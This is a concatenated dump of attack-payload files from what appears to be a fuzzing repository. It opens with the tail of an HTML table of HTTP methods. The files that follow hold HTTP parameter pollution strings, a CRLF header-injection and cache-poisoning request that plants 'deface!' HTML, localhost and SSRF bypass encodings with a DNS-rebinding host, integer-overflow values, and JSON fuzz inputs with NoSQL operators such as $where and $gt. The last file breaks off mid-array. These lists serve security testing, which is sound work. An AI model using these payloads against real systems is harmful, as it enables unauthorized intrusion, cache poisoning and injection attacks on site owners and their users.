HTTP/1.1\r\n</p>
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
host></span>\r\n</p>
<p class=doctext>Content-Length: <span class=docemphasis1><length in
bytes></span>\r\n</p>
<p class=doctext>Content-Type: <span class=docemphasis1><content type></span>\r\n\r\n</p>
<p class=doctext><span class=docemphasis1><data to put to file></span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>The PUT method allows for data to be transferred to an HTTP
server and stored at the location identified by the Request-URI. </span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>OPTIONS </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=doctext>OPTIONS <span class=docemphasis1><Request-URI></span>
HTTP/1.1\r\n</p>
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
host></span>\r\n\r\n</p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>"The OPTIONS method represents a request for information
about the communication options available on the request/response chain
identified by the Request-URI." Section 9.2, RFC 2616. </span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>DELETE </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=doctext>DELETE <span class=docemphasis1><Request-URI></span>
HTTP/1.1\r\n</p>
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
host></span>\r\n\r\n</p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>"The DELETE method requests that the origin server delete
the resource identified by the Request-URI."Section 9.7, RFC 2616. </span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>TRACE </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=doctext>TRACE <span class=docemphasis1><Request-URI></span>
HTTP/1.1\r\n</p>
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
host></span>\r\n\r\n</p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>"The TRACE method is used to invoke a remote,
application-layer loop-back of the request message. TRACE allows the client
to see what is being received at the other end of the request chain and use
that data for testing and diagnostic information."Section 9.8, RFC
2616. </span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>CONNECT </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=doctext>CONNECT <span class=docemphasis1><Request-URI></span>
HTTP/1.1\r\n</p>
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
host></span>\r\n\r\n</p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>The CONNECT message type is used to specify a proxy connection
to the resource identified by the Request-URI. </span></p>
</td>
</tr>
</COLGROUP>
</table>
<p style='margin:0cm;margin-bottom:.0001pt'><a name=app02table02></a><span
style='color:black;display:none'> </span></p>
<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
style='width:100.0%'>
<tr>
<td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
<h5 align=center style='text-align:center'><span style='font-size:10.5pt;
font-family:Arial'>Table B-2. HTTP/1.0 Methods and Field Definitions</span></h5>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
font-family:Arial;color:black'>Method</span></b></span><b><span
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
font-family:Arial;color:black'>Request</span></b></span><b><span
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
font-family:Arial;color:black'>Definition</span></b></span><b><span
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>GET </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>GET <span class=docemphasis1><Request-URI>?query_string</span>
HTTP/1.1\r\n\r\n </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>The GET method is used to retrieve whatever is stored or
produced by the resource located at the specified Request-URI. The GET method
can be used to request files, to invoke server-side scripts, to interact with
server-side CGI programs, and more. When HTML form variables are submitted with
the form action set to GET, the form parameters are encoded in a query string
and submitted to the HTTP server as part of the Request-URI using the GET
request method. </span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>POST </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=doctext><span lang=EN-GB>POST <span class=docemphasis1><Request-URI></span>
HTTP/1.1\r\n\</span></p>
<p class=doctext><span lang=EN-GB>Content-Length: <span class=docemphasis1><length
in bytes></span>\r\n</span></p>
<p class=doctext><span lang=EN-GB>Content-Type: <span class=docemphasis1><content
type></span>\r\n\r\n</span></p>
<p class=doctext><span class=docemphasis1><span lang=EN-GB><query_string
or other data to post to Request-URI></span></span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
color:black'>The POST method is used to submit data to the resource located
at the specified Request-URI. Typically, the resource located at the
specified Request-URI is a server-side script or CGI program designed to
processes form data. When HTML form variables are submitted with the form
action set to POST, the form parameters are encoded and submitted to the HTTP
server as the body of the POST request message. </span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>HEAD </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
color:black'>HEAD <span class=docemphasis1><Request-URI></span>
HTTP/1.1\r\n\r\n </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
color:black'>"The HEAD method is identical to the GET method except that
an HTTP 1.1 server should not return a message-body in the response. The
meta-information contained in the HTTP headers in response to a HEAD request
should be identical to the information sent in response to a GET request. This
method can be used for obtaining meta-information about the entity implied by
the request without transferring the entity-body itself. This method is often
used for testing hypertext links for validity, accessibility, and recent
modification."Section 9.4, RFC 2616. </span></p>
</td>
</tr>
</COLGROUP>
</table>
<p style='margin:0cm;margin-bottom:.0001pt'><a name=app02table03></a><span
style='color:black;display:none'> </span></p>
<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
style='width:100.0%'>
<tr>
<td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
<h5 align=center style='text-align:center'><span lang=EN-GB style='font-size:
10.5pt;font-family:Arial'>Table B-3. HTTP/1.0 Undefined Method Description as
Found in </span><span style='font-size:10.5pt;font-family:Arial'><a
href="http:// /?xmlid=0-201-76176-9/app04#app04"><span
lang=EN-GB style='color:#003399'>Appendix D</span></a></span><span
lang=EN-GB style='font-size:10.5pt;font-family:Arial'> of RFC 1945.</span></h5>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
font-family:Arial;color:black'>Method</span></b></span><b><span
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
font-family:Arial;color:black'>Request</span></b></span><b><span
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
font-family:Arial;color:black'>Definition</span></b></span><b><span
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>PUT </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>The PUT message format is not defined in RFC 1945. In practice,
the PUT message format is the same as for HTTP 1.1. </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>The PUT method allows for data to be transferred to an HTTP
server and stored at the location identified by the Request-URI. </span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>DELETE </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>The DELETE message format is not defined in RFC 1945. In
practice, the DELETE message format is the same as for HTTP 1.1. </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>"The DELETE method requests that the origin server delete
the resource identified by the Request-URI." Appendix D.1, Section
D.1.2, RFC 1945. </span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>LINK </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>The LINK message format is not defined in RFC 1945 and is not
implemented by most/all HTTP 1.0 implementations. </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>"The LINK method establishes one or more Link relationships
between the existing resource identified by the Request-URI and other
existing resources." Appendix D.1, Section D.1.3, RFC 1945. </span></p>
</td>
</tr>
<tr>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>UNLINK </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>The UNLINK message format is not defined in RFC 1945 and is not
implemented by most/all HTTP 1.0 implementations. </span></p>
</td>
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
color:black'>"The UNLINK method removes one or more Link relationships
from the existing resource identified by the Request-URI." Appendix
D.1, Section D.1.4, RFC 1945. </span></p>
</td>
</tr>
</table>
<p class=MsoNormal> </p>
</div>
<!--504690132--><br></body>
</html>
================================================
FILE: attack/http-protocol/hpp.txt
================================================
# HTTP paramter polution and interpretation payloads by Jacco van Tuijl
?id=id=1
&id=1?id=2
?id['&id=1']=2
?id[1&id=2]=1
?id=1&id=2
&id=1&id=2
?id=1%26id%3D2
?id&id=1
????id=1
&&&&id=1
?id=id['1']=2
?id=1#id=2
?id==1
?id===1
;id=1?id=2
?id;id=1
&id=1;id=2
#id=1?id=2&id=3
?id=1,2
?id1,id2=1
?id[=1&id=2]=3
?id[&id=2]=1
?id=[1,2]
?id&=1
?id[]=1&id=2
?id=/:@&=+$&id=2
?id[=/:@&=+$&id=2]=1
?id={id:{id:1},2}
?id[{id:{id[]:1},2}]=3
?id=%23?id=1
?id=1%26id=2
?id=1%2526id=2
?id=1%c0%a6id=2
?id=1\uc0a6id=2
?id=1&id=2
?id=1&id=2
?id=1%u0026;id=2
================================================
FILE: attack/http-protocol/http-header-cache-poison.txt
================================================
# Header Injection / Cache Poison 1.0 (fuzz the entire get req) (12 April 2010)
# creative commons license http://creativecommons.org/licenses/by/3.0/
# projurl
GET http://{SITE}testsite.com/redir.php?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>deface!</html> HTTP/1.1GET http://{SITE}/{REDIRECTURL}?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>deface!</html> HTTP/1.1
%0d%0aX-Injection-Header:%20AttackValue
================================================
FILE: attack/http-protocol/http-protocol-methods.txt
================================================
OPTIONS
GET
HEAD
POST
PUT
DELETE
TRACE
TRACK
CONNECT
PROPFIND
PROPPATCH
MKCOL
COPY
MOVE
LOCK
UNLOCK
VERSION-CONTROL
REPORT
CHECKOUT
CHECKIN
UNCHECKOUT
MKWORKSPACE
UPDATE
LABEL
MERGE
BASELINE-CONTROL
MKACTIVITY
ORDERPATCH
ACL
PATCH
SEARCH
ARBITRARY
BCOPY
BDELETE
BMOVE
BPROPFIND
BPROPPATCH
DEBUG
INDEX
NOTIFY
POLL
RPC_IN_DATA
RPC_OUT_DATA
SUBSCRIBE
UNSUBSCRIBE
X-MS-ENUMATTS
================================================
FILE: attack/http-protocol/http-request-header-field-names.txt
================================================
Accept
Accept-Charset
Accept-Encoding
Accept-Language
Accept-Datetime
Authorization
Cache-Control
Connection
Cookie
Content-Length
Content-MD5
Content-Type
Date
Expect
From
Host
If-Match
If-Modified-Since
If-None-Match
If-Range
If-Unmodified-Since
Max-Forwards
Origin
Pragma
Proxy-Authorization
Range
Referer
TE
User-Agent
Upgrade
Via
Warning
X-Requested-With
DNT
X-Forwarded-For
X-Forwarded-Host
X-Forwarded-Proto
Front-End-Https
X-Http-Method-Override
X-ATT-DeviceId
X-Wap-Profile
Proxy-Connection
================================================
FILE: attack/http-protocol/http-response-header-field-names.txt
================================================
Access-Control-Allow-Origin
Accept-Ranges
Age
Allow
Cache-Control
Connection
Content-Encoding
Content-Language
Content-Length
Content-Location
Content-MD5
Content-Disposition
Content-Range
Content-Type
Date
ETag
Expires
Last-Modified
Link
Location
P3P
Pragma
Proxy-Authenticate
Refresh
Retry-After
Server
Set-Cookie
Status
Strict-Transport-Security
Trailer
Transfer-Encoding
Upgrade
Vary
Via
Warning
WWW-Authenticate
X-Frame-Options
Public-Key-Pins
X-XSS-Protection
Content-Security-Policy
X-Content-Security-Policy
X-WebKit-CSP
X-Content-Type-Options
X-Powered-By
X-UA-Compatible
================================================
FILE: attack/http-protocol/known-uri-types.txt
================================================
aaa:
aaas:
about:
acap:
adiumxtra:
afp:
aim:
apt:
aw:
beshare:
bitcoin:
bolo:
callto:
cap:
chrome:
cid:
coap:
content:
crid:
cvs:
data:
dav:
dict:
dns:
doi:
ed2k:
facetime:
fax:
feed:
file:
finger:
fish:
ftp:
geo:
gg:
git:
gizmoproject:
go:
gopher:
gtalk:
h323:
http:
https:
iax:
icap:
im:
imap:
info:
ipp:
irc:
irc6:
ircs:
iris.beep:
iris.lws:
iris.xpcs:
iris.xpc:
iris:
itms:
jar:
javascript:
keyparc:
lastfm:
ldap:
ldaps:
lsid:
magnet:
mailto:
maps:
market:
message:
mid:
mms:
modem:
msnim:
msrps:
msrp:
mtqp:
mumble:
mupdate:
mvn:
news:
nfs:
nntp:
notes:
opaquelocktoken:
palm:
paparazzi:
platform:
pop:
pres:
prospero:
proxy:
psyc:
query:
rmi:
rsync:
rtmp:
rtsp:
secondlife:
service:
sftp:
sgn:
shttp:
sieve:
sip:
sips:
skype:
smb:
sms:
snmp:
soap.beeps:
soap.beep:
soldat:
spotify:
ssh:
steam:
svn:
tag:
teamspeak:
tel:
telnet:
tftp:
things:
thismessage:
tip:
tv:
udp:
unreal:
urn:
ut2004:
uuid:
vemmi:
ventrilo:
view-source:
wais:
webcal:
wss:
ws:
wtai:
wyciwyg:
xfire:
xmlrpc.beeps:
xmlrpc.beep :
xmpp:
xri:
ymsgr:
z39.50r:
z39.50s:
================================================
FILE: attack/http-protocol/user-agents.txt
================================================
# List of user agents from jbrofuzz (13 april 2010)
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
User-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT)
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)
User-Agent: Mozilla/4.79 [en] (WinNT; U)
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14
User-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5G77 Safari/525.20
User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
User-Agent: Opera/9.27 (Windows NT 5.1; U; en)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.25 Safari/525.19
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19
User-Agent: Wget/1.8.2
User-Agent: Mozilla/5.0 (PLAYSTATION 3; 1.00)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6))
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729) JBroFuzz/1.4
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.centos4 Firefox/1.0.7
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20070606
User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0.0.14
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5
================================================
FILE: attack/integer-overflow/integer-overflows.txt
================================================
-1
0
0x100
0x1000
0x3fffffff
0x7ffffffe
0x7fffffff
0x80000000
0xfffffffe
0xffffffff
0x10000
0x100000
================================================
FILE: attack/ip/localhost.txt
================================================
127.0.0.1
127.0.0.2
127.1
127.2
::1
0:0:0:0:0:0:0:1
0:0:0:000:0:0:0:1
0000:0000:0000:0000:0000:0000:0000:0001
2130706433
2130706434
7F000001
7F000002
localhos
127.123.123.123
0x7f.1
017700000001
127.0.0.1
localhost
test.localtest.me
0x7f.0x0.0x0.0x1
0177.00.00.01
017700000001
0x7f001
2130706433
017700000001
%6c%6f%63%61%6c%68%6f%73%74
%31%32%37%2e%30%2e%30%2e%31
0x7f000001
00000000177.000000000.000000000.000000001
0x7f.0x0.0x0.0x1
0x000000007f.0x000000000.0x000000000.0x000000001
0x7f.0x0.0x0.1
0x7f.0x0.0.1
0x7f.0.0.1
127.0x0.0x0.0x1
127.0.0x0.0x1
127.0.0.0x1
0177.00.00.1
0177.00.0.1
0177.0.0.1
127.00.00.01
127.0.00.01
127.0.0.01
0x7f.0x0.1
0x7f.1
0177.00.1
0177.1
0x7f.00.1
0177.0x0.1
::ffff:7f000001
0:0:0:0:0:ffff:7f000001
0000:0000:0000:0000:0000:ffff:7f000001
0000:0000:0000:0000:0000:ffff:127.0.0.1
A.34.192.228.43.1time.127.0.0.1.99times.repeat.rebind.network
hostname
0177.1
0177.2
0177.0.1
0177.0.2
017700000001
017700000002
0x7F000001
0x7F000002
0X07f.0.0.1
================================================
FILE: attack/json/JSON_Fuzzing.txt
================================================
{}
{"1":"0"}
{"1":0}
{"0":"\x00"}
{"0":[]}
{"0":[1]}
{"0":[1,2]}
{"0":["1","2"]}
{"\x00":"0"}
{"\x00":0}
{"\x00":""}
{"\x00":[]}
{"\x00":[1]}
{"\x00":[1,2]}
{"__class":"null","A":"B"}
{"_class":"null","A":"B"}
{"__className":"null","A":"B"}
{"_className":"null","A":"B"}
{"cls":"null","A":"B"}
{"Cls":"null","A":"B"}
{"class":"null","A":"B"}
{"klass":"null","A":"B"}
{"Class":"null","A":"B"}
{"Klass":"null","A":"B"}
{"__kind":"null","A":"B"}
{"_kind":"null","A":"B"}
{"kind":"null","A":"B"}
{"Kind":"null","A":"B"}
{"__constructor":"null"}
{"_constructor":"null"}
{"constructor":"null"}
{"_id":1}
{"_id":"1"}
{"id":1}
{"id":"1"}
{"uid":1}
{"uid":"1"}
{"_uid":1}
{"_uid":"1"}
{"toString":"while(1);"}
{"toJSON":"while(1);"}
{"length":999999999999}
{"Length":999999999999}
{"count":999999999999}
{"Count":999999999999}
{"length":99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}
{"valueOf":"while(1);"}
{":test":"1"}
{"$where":"1==1"}
{"$where":"1"}
{"$or":"1==1"}
{"$or":"1"}
{"$gt": ""}
[]
[1,2]
["1",2]
["1","2"]
["\x00"]
["\x00", "\x00"]
[{"1":"0"}]
["1",{"1":"0"}]
[1,{"1":"0"}]
[{"1":"0"},1]
[":test", "1"]
[":\x00", "1"]
["1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1","1"